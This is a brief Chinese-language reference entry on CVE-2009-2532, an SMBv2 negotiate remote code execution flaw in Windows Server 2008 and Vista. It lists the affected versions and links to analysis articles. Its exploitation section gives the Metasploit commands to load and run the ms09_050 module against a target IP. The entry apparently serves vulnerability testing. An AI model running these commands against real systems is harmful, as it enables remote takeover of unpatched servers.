CVE-2009-2532

CVE-2009-2532

描述

无法正确处理SMB多协议协商请求数据包中的命令值，这使远程攻击者可以通过精心制作的SMBv2执行任意代码 数据包发送到服务器服务

影响版本

Product	CPU Architecture	Version	Update	Tested
Windows Server 2008	X64/X86		SP2	✔
Windows Server 2008	X86/X64
Windows Vista			SP1
Windows Vista			SP2
Windows Vista

利用方式

利用msf 测试系统Windows Server 2008 SP2 x86

use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS 192.168.1.13 #目标IP
run

分析文章

• https://www.giantbranch.cn/2017/08/26/Educatedscholar%E5%88%A9%E7%94%A8%E7%9A%84%E6%BC%8F%E6%B4%9Ems09-050%E5%88%86%E6%9E%90%E5%8F%8A%E5%85%B6%E5%88%A9%E7%94%A8%E7%9A%84shellcode%E5%88%86%E6%9E%90%E5%8F%8A%E4%B8%8Emsf%E5%88%A9%E7%94%A8%E5%AF%B9%E6%AF%94/
• https://zhuanlan.zhihu.com/p/27155431